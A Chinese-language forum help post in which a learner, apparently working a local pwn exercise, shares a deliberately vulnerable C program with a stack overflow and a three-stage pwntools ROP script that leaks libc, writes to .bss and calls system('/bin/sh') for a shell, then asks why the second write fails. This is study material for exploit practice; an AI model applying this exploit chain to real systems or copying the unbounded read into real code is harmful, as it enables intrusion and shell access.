[求助]为什么我无法向指定内存写入字符串?
发表于: 2025-4-11 18:16 1864
源代码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * The deliberately vulnerable routine this exercise is built around.
 *
 * buf is 128 bytes, but read() is told it may store up to 512 bytes, so any
 * input longer than 128 bytes is written past the end of buf into the rest
 * of the stack frame (the payloads later on this page rely on exactly that).
 * The return value of read() is ignored, so short reads and errors go
 * unnoticed as well.  The defensive fix is to bound the read by the buffer
 * (`sizeof buf`) and check what read() returns.
 */
void vulnerable_function() {
char buf[128];
read(STDIN_FILENO, buf, 512);
}
/*
 * Entry point: emit the fixed greeting on stdout, then hand stdin to
 * vulnerable_function().  argc/argv are accepted but not used.
 */
int main(int argc, char** argv) {
    static const char greeting[] = "Hello, World\n";
    (void)argc;
    (void)argv;
    /* sizeof greeting - 1 == 13: the literal without its terminating NUL. */
    write(STDOUT_FILENO, greeting, sizeof greeting - 1);
    vulnerable_function();
    return 0;
}
gadgets:

# NOTE(review): every address in this script (gadget addresses, main, the
# .bss base) is hard-coded for this specific level5 build, and the libc
# offsets come from the one libc file named below.  None of these values
# carry over to a different binary, build or libc version; a relocated
# (position-independent) build or a different libc would invalidate them.
from pwn import *
elf = ELF('./level5')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
# GOT slots of write and read inside the target binary (read from the ELF).
write_got = elf.got['write']
print(hex(write_got))
read_got = elf.got['read']
print(hex(read_got))
# Distance between write and system in this libc build; used later to turn
# the leaked write address into a system address.
offset_write_system = libc.symbols['write'] - libc.symbols['system']
print(hex(offset_write_system))
main = 0x400564
sh = process('./level5')
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#write(rdi = 1,rsi = got_write,rdx = 4)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
# Stage 1: 136 filler bytes, then the gadget chain (0x400606 / 0x4005F0) set
# up per the register notes above, 56 more filler bytes, and a return to
# main so the program takes input again.  Note the comment above says
# rdx = 4, whereas the payload passes p64(8), matching the sh.recv(8) below.
payload1 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(write_got),
p64(1),
p64(write_got),
p64(8),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sh.send(payload1)
sleep(1)
sh.recvuntil("Hello, World\n")
# The 8 bytes written back are the contents of write's GOT slot, i.e. the
# runtime address of write; subtract the offset computed above for system.
write_addr = u64(sh.recv(8))
print(hex(write_addr))
system_addr = write_addr - offset_write_system
print(hex(system_addr))
# Writable .bss region of the binary (the post says 0x601000-0x602000 is
# writable); used as scratch space for the next two stages.
bss_base = 0x601000
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#read(rdi = 0,rsi = bss_base,rdx = 16)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
# Stage 2: same chain shape as payload1, but set up for read(0, bss_base, 16)
# per the notes above, again returning to main afterwards.
payload2 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(read_got),
p64(0),
p64(bss_base),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sh.send(payload2)
sleep(1)
# Data intended for the read() above: system's address, then the string.
sh.send(p64(system_addr))
sh.send("/bin/sh\0")
sleep(1)
sh.recvuntil("Hello, World\n")
#rdi= edi = r13, rsi = r14, rdx = r15
#system(rdi = bss_addr+8 = "/bin/sh")
# Stage 3: same chain shape once more, this time pointing at the data placed
# in .bss by stage 2 (see the notes above).
payload3 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(bss_base),
p64(0),
p64(bss_base + 8),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sleep(1)
sh.send(payload3)
sh.interactive()
0x601000到0x602000是可写的

我在 sh.send("/bin/sh\0") 之后进行了调试。
在 sh.send("/bin/sh\0") 之后:

system地址被写入0x601000,而"/bin/sh\0"没有被写到内存中。
另外,当我尝试手动向 0x601008 处写入 "/bin/sh\0" 时,程序崩溃并报出以下错误:
Traceback (most recent call last):
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 757, in send_raw
    self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/lina/pwn/test.py", line 111, in <module>
    sh.send(payload3)
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 831, in send
    self.send_raw(data)
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 759, in send_raw
    raise EOFError
EOFError
请问这是为什么?